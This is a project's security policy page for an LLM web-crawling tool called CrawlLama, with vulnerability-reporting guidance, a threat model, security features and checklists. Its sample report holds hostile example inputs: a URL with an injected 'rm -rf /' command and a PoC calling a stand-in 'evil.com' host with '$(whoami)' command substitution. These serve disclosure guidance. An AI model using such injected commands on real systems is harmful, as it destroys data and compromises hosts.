Navigation: README | Contributing | Docs | Changelog
The security of CrawlLama is important to us. If you discover a vulnerability, please report it responsibly.
We provide security updates for the following versions: | Version | Supported |
| Version | Supported |
|---|---|
| 1.4.8 | ✅ |
| 1.3.x | ❌ |
| 1.2.x | ❌ |
| < 1.2 | ❌ |
Do NOT create public GitHub Issues for vulnerabilities. This could put other users at risk.
Please report vulnerabilities responsibly via:
- Go to Security Advisories
- Click "Report a vulnerability"
- Fill out the form with details
- Email: crawllama.support@protonmail.com
- Subject:
[SECURITY] Short Description - Encryption: Proton Mail offers end-to-end encryption
Please provide as many details as possible:
- Type of vulnerability (e.g. Code Injection, XSS, Arbitrary File Read)
- Affected version(s)
- Steps to reproduce
- Proof of Concept (PoC) code or screenshot
- Potential impact (e.g. RCE, data leak, DoS)
- Suggested solution (optional)
- CVE-ID (if already available)
Example:
**Vulnerability:** Command Injection in page_reader.py
**Version:** v1.3.0
**Description:**
The function `fetch_page()` in `tools/page_reader.py` does not properly validate user input, which can lead to command injection.
**Steps:**
1. Start CrawlLama
2. Enter the following URL: `http://example.com; rm -rf /`
3. Command is executed on the system
**Impact:**
Remote Code Execution (RCE) as the user running CrawlLama
**PoC:**
```python
from tools.page_reader import fetch_page
fetch_page("http://evil.com$(whoami)")Suggestion:
URL validation with validators.url() before processing
We strive for the following response times:
- Initial response: Within 48 hours
- First assessment: Within 7 days
- Fix for critical issues: Within 30 days
- Fix for moderate issues: Within 90 days
We use the CVSS v3.1 scoring system: | Severity | CVSS Score | Examples | |-------------|------------|---------------------------| | Critical| 9.0-10.0 | RCE, Authentication Bypass| | High | 7.0-8.9 | SQL Injection, XSS | | Medium | 4.0-6.9 | CSRF, Information Disclosure| | Low | 0.1-3.9 | Minor Information Leaks |
CrawlLama is designed for local operation. If exposed publicly (e.g. via FastAPI):
Important Security Measures:
- Authentication: Implement API key authentication
- Rate Limiting: Use the built-in rate limiting (
security.rate_limit) - Input Validation: All user inputs are validated
- Firewall: Expose API only via firewall/reverse proxy
- HTTPS: Use TLS for encrypted communication
- Malicious Content: Websites may contain harmful content
- SSRF: Server-Side Request Forgery via user-controlled URLs
- DoS: Infinite redirects or large downloads
Mitigation:
- Domain blacklist enabled (
data/blacklist.txt) - Timeout limits configured
- Max response size limited
- robots.txt is respected
- Prompt Injection: Malicious prompts in search results
- Data Poisoning: False information in RAG database
- Model Hallucination: Generated misinformation
Mitigation:
- Hallucination detection enabled (
core/hallu_detect.py) - Output sanitization
- Source attribution
We monitor dependencies regularly:
# Check dependencies
pip-audit
safety check
# Or with our script
python scripts/check_dependencies.pyAutomatic updates: Dependabot is enabled and creates PRs for security updates.
CrawlLama has the following built-in security features:
# API Key Authentication
X-API-Key: your-secure-api-key-here
# Role-Based Access Control (RBAC)
# - admin: Full access to all endpoints
# - user: Standard access (queries, memory, sessions)
# - read_only: Read-only access (queries only)# Cross-Site Request Forgery protection
# Required for all state-changing operations (POST/PUT/PATCH/DELETE)
# 1. Get CSRF token
POST /csrf-token
Headers: X-API-Key: your-key
# 2. Use token in subsequent requests
POST /config
Headers:
X-API-Key: your-key
X-CSRF-Token: token-from-step-1# utils/validators.py
validate_url() # Check URL format
validate_query() # Check query length/content
sanitize_output() # Clean LLM output
validate_url_ssrf_safe() # SSRF protection with DNS rebinding detection# Distributed rate limiting with Redis
# Falls back to in-memory if Redis unavailable
# Per-user, per-endpoint limits
# Default: 60 requests/minute
# Configurable via RATE_LIMIT environment variable# Enhanced session security
# - Session timeout (24 hours default)
# - IP address tracking
# - Last activity tracking
# - Session refresh capability
POST /session/refresh # Extend session expiration# Comprehensive security event logging
# - All API requests logged
# - Authentication/authorization events
# - Configuration changes
# - Security events (CSRF, rate limits)
# Query audit logs (admin only):
GET /admin/audit/logs?event_type=authentication&status=failure# Graceful key rotation with zero downtime
# Multiple active keys per user
# Generate new key:
POST /admin/api-keys/generate
# Rotate existing key:
POST /admin/api-keys/rotate
# List your keys:
GET /admin/api-keys/list
# Revoke old key:
DELETE /admin/api-keys/revoke/{key_id}# data/blacklist.txt
# Blocks known malicious domains
malware-site.com
phishing-domain.net# API keys are stored encrypted
from utils.secure_config import SecureConfig
config = SecureConfig()
config.set_key("api_key", "secret") # Encrypted# Plugins run in a separate namespace
# No access to sensitive data
# Path traversal protectionAll responses include comprehensive security headers:
Content-Security-Policy: Strict CSP to prevent XSSX-Content-Type-Options: nosniff: Prevent MIME sniffingX-Frame-Options: DENY: Prevent clickjackingX-XSS-Protection: 1; mode=block: Legacy XSS protectionStrict-Transport-Security: Force HTTPS (when using HTTPS)Referrer-Policy: strict-origin-when-cross-origin: Control referrer leakage
CSRF protection includes Origin and Referer header validation for all state-changing requests.
Automatic security configuration validation on startup:
- Checks API key strength
- Validates allowed hosts/origins configuration
- Warns about insecure settings
- Optional strict mode to block startup on security issues
- Do not commit secrets: Use
.envfor API keys - Strong API keys: Use keys with at least 32 characters
- Configure production settings:
# .env
CRAWLLAMA_API_KEY=your-strong-api-key-min-32-chars
ALLOWED_HOSTS=yourdomain.com,www.yourdomain.com
ALLOWED_ORIGINS=https://yourdomain.com,https://www.yourdomain.com
RATE_LIMIT_SECRET=your-secret-for-rate-limiting
REDIS_URL=redis://localhost:6379/0 # For distributed deployments- Do not expose API: Local access only recommended, or use reverse proxy with TLS
- Use RBAC: Assign appropriate roles (admin/user/read_only) to API keys
- Rotate API keys: Regularly rotate keys using the rotation endpoint
- Monitor audit logs: Check
/admin/audit/logsregularly for suspicious activity - Keep updated: Install security updates promptly
- Enable CSRF protection: Always include CSRF tokens for state-changing operations
- Review sessions: Check active sessions and revoke suspicious ones
- Validate input: Use
validators.pyfor all inputs - Sanitize output: Clean LLM outputs before display
- Keep secrets out of code: Never in code, always in
.env - Check dependencies: Run
pip-auditbefore every release - Write security tests: Cover CSRF, RBAC, input validation, etc.
- Use CSRF protection: Apply
Depends(verify_csrf_token)to state-changing endpoints - Apply RBAC: Use
Depends(verify_role(Role.ADMIN))for admin-only endpoints - Log security events: Use
audit_loggerfor security-relevant actions - Follow principle of least privilege: Grant minimum necessary permissions
- Code review: Have security-critical changes reviewed
- Use HTTPS: Always use TLS in production
- Configure firewall: Only expose necessary ports
- Use Redis: Enable Redis for distributed rate limiting and CSRF storage
- Set strict mode: Enable
SECURITY_STRICT_MODE=trueto block on security issues - Monitor logs: Set up log aggregation (ELK, Splunk, etc.)
- Backup API keys: Store key backups securely
- Document roles: Keep record of who has which role
- Regular audits: Review audit logs weekly
- Incident response plan: Have a plan for security incidents
- Update regularly: Subscribe to security advisories
- []
pip-auditshows no critical/high vulnerabilities - [] No secrets committed in code/config
- []
.env.examplecontains only placeholders - [] Domain blacklist updated
- [] Rate limiting enabled and tested
- [] Input validation for all user inputs
- [] Output sanitization for LLM responses
- [] CSRF protection applied to state-changing endpoints
- [] RBAC roles configured and tested
- [] Audit logging enabled and tested
- [] API key rotation mechanism tested
- [] Session management configured (timeouts, IP tracking)
- [] Security headers validated
- [] Origin/Referer validation tested
- [] Startup security validation passes
- [] Security tests pass (CSRF, RBAC, SSRF, XSS, path traversal)
- [] Documentation updated (SECURITY.md, API docs)
- [] Production configuration reviewed (ALLOWED_HOSTS, ALLOWED_ORIGINS)
- [] Redis configured for distributed deployments
- [] HTTPS/TLS configured for production
After fixing a vulnerability:
- Security advisory is published on GitHub
- CVE is requested (for high/critical)
- Release notes mention the fix (without details)
- Credits for the reporter (if desired)
- 30-day waiting period before full disclosure
We thank the following security researchers for responsible disclosure:
No reports yet - be the first!
Currently, we have no official bug bounty program.
However, we honor all security reports with:
- Public credits (if desired)
- Mention in release notes
- Hall of Fame entry
- GitHub Security: Security Advisories
Thank you for helping keep CrawlLama secure!